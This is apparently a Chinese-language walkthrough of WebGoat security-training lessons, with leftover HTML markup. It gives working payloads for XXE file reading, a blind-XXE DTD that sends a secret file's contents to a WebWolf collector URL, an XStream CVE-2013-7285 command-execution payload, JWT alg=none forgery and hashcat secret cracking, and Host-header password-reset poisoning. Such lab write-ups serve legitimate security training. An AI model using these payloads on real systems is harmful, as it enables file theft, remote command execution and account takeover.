WebGoat通关教学：安全配置与身份认证漏洞<\/h1>

(A5) 安全配置错误<\/h2>

1. XXE漏洞利用<\/h3>

1-4关：基础XXE注入<\/h4>

目标<\/strong>：通过XXE获取服务器的root目录<\/li>

方法<\/strong>：
<?xml version="1.0"?><\/span> <\/span><\/span><!DOCTYPE author [ <\/span><\/span><\/span> <!ENTITY ls SYSTEM "file:\/\/\/"><\/span> <\/span><\/span>]> <\/span><\/span><comment><\/span> <\/span><\/span> <text><\/span>&ls;<\/text><\/span> <\/span><\/span><\/comment><\/span> <\/span><\/span><\/code><\/pre><\/li> 关键点<\/strong>：使用file:\/\/<\/code>协议读取服务器文件系统<\/li> <\/ul> 1-7关：JSON格式的XXE<\/h4> 目标<\/strong>：在JSON格式请求中实现XXE注入<\/li> 方法<\/strong>：修改请求的Content-Type为application\/xml<\/code><\/li> 使用与1-4关相同的XML payload<\/li> <\/ol> <\/li> 关键点<\/strong>：当后端未严格限制请求格式时，可通过修改Content-Type绕过<\/li> <\/ul> 1-11关：XXE盲注<\/h4> 目标<\/strong>：通过XXE盲注获取服务器文件内容<\/li> 步骤<\/strong>：在WebWolf上传DTD文件(attack1.dtd)： <?xml version="1.0" encoding="UTF-8"?><\/span> <\/span><\/span><!ENTITY % file SYSTEM "file:\/\/\/home\/webgoat\/.webgoat-2023.8\/XXE\/admintest\/secret.txt"><\/span> <\/span><\/span><!ENTITY % print "<!ENTITY % send SYSTEM 'http:\/\/127.0.0.1:9090\/WebWolf\/landing?text=%file;'><\/span>"> <\/span><\/span><\/code><\/pre><\/li> 注入触发DTD的XML： <?xml version="1.0"?><\/span> <\/span><\/span><!DOCTYPE author [ <\/span><\/span><\/span> <!ENTITY % ls SYSTEM "http:\/\/127.0.0.1:9090\/WebWolf\/files\/admintest\/attack1.dtd"><\/span> <\/span><\/span> %ls; <\/span><\/span> %print; <\/span><\/span> %send; <\/span><\/span>]> <\/span><\/span><comment><\/span> <\/span><\/span> <text><\/span>aaaaa<\/text><\/span> <\/span><\/span><\/comment><\/span> <\/span><\/span><\/code><\/pre><\/li> 在WebWolf查看URL编码的结果并解码<\/li> <\/ol> <\/li> 关键点<\/strong>：利用外部实体将文件内容通过HTTP请求外带<\/li> <\/ul> (A6) 漏洞组件<\/h2> 1. 漏洞组件利用<\/h3> 1-5关：组件版本漏洞<\/h4> 目标<\/strong>：展示不同版本组件的安全问题<\/li> 方法<\/strong>：直接点击完成<\/li> <\/ul> 1-12关：CVE-2013-7285远程命令执行<\/h4> payload<\/strong>： <contact<\/span> class=<\/span>'dynamic-proxy'<\/span>><\/span> <\/span><\/span> <interface><\/span>org.owasp.webgoat.lessons.vulnerablecomponents.Contact<\/interface><\/span> <\/span><\/span> <handler<\/span> class=<\/span>'java.beans.EventHandler'<\/span>><\/span> <\/span><\/span> <target<\/span> class=<\/span>'java.lang.ProcessBuilder'<\/span>><\/span> <\/span><\/span> <command><\/span> <\/span><\/span> <string><\/span>pwd<\/string><\/span> <\/span><\/span> <\/command><\/span> <\/span><\/span> <\/target><\/span> <\/span><\/span> <action><\/span>start<\/action><\/span> <\/span><\/span> <\/handler><\/span> <\/span><\/span><\/contact><\/span> <\/span><\/span><\/code><\/pre><\/li> 关键点<\/strong>：利用Java反序列化漏洞执行系统命令<\/li> <\/ul> (A7) 身份认证失败<\/h2> 1. 认证绕过<\/h3> 1-2关：安全问题绕过<\/h4> 方法<\/strong>：修改安全问题参数名将secQuestion0<\/code>和secQuestion1<\/code>改为secQuestion3<\/code>和secQuestion4<\/code><\/li> <\/ul> <\/li> <\/ul> 2. 不安全登录<\/h3> 2-2关：解密登录凭证<\/h4> 步骤<\/strong>：点击登录按钮捕获返回的JS代码<\/li> 解码其中的16进制字符串<\/li> 提取用户名和密码(数组的0和1位置)<\/li> <\/ol> <\/li> <\/ul> 3. JWT令牌漏洞<\/h3> 3-4关：JWT解码<\/h4> 方法<\/strong>：直接解码JWT获取用户名<\/li> <\/ul> 3-6关：JWT权限提升<\/h4> 步骤<\/strong>：解码JWT发现admin字段为false<\/li> 修改alg为none绕过签名验证<\/li> 保持JWT格式正确(第三部分为空但保留分隔符点)<\/li> <\/ol> <\/li> <\/ul> 3-11关：JWT密钥爆破<\/h4> 方法<\/strong>： hashcat -a 0<\/span> -m 16500<\/span> jwtstring wordlist <\/span><\/span><\/code><\/pre><\/li> 结果<\/strong>：密钥为"shipping"<\/li> <\/ul> 3-13关：JWT身份伪造<\/h4> 方法<\/strong>：修改当前token的用户为tom<\/li> 或修改日志中tom的token有效期<\/li> 使用alg=none绕过签名或爆破密钥<\/li> <\/ol> <\/li> <\/ul> 4. 密码重置漏洞<\/h3> 4-2关：基础密码重置<\/h4> 方法<\/strong>：在忘记密码页面填入账户，WebWolf接收重置链接<\/li> <\/ul> 4-4关：安全问题爆破<\/h4> 方法<\/strong>：爆破简单的密保问题(如颜色)<\/li> <\/ul> 4-6关：他人密码重置<\/h4> 步骤<\/strong>：拦截密码重置请求<\/li> 修改Host头为127.0.0.1:9090<\/code>使邮件发往WebWolf<\/li> 在WebWolf中获取token<\/li> <\/ol> <\/li> <\/ul> 5. 安全密码<\/h3> 5-4关：设置强密码<\/h4> 方法<\/strong>：设置足够复杂的密码<\/li> <\/ul> (A8) 软件与数据完整性<\/h2> 1. 不安全反序列化<\/h3> 1-5关：反序列化漏洞<\/h4> 关键点<\/strong>：反序列化VulnerableTaskHolder<\/code>类，只能执行sleep和ping命令<\/li> 方法<\/strong>：生成特定的序列化字符串<\/li> <\/ul> (A9) 安全日志失败<\/h2> 1. 日志安全问题<\/h3> 1-2关：简单认证绕过<\/h4> 方法<\/strong>：直接输入admin<\/li> <\/ul> 1-4关：日志中的敏感信息<\/h4> 方法<\/strong>：检查服务启动日志寻找管理员初始密码<\/li> <\/ul>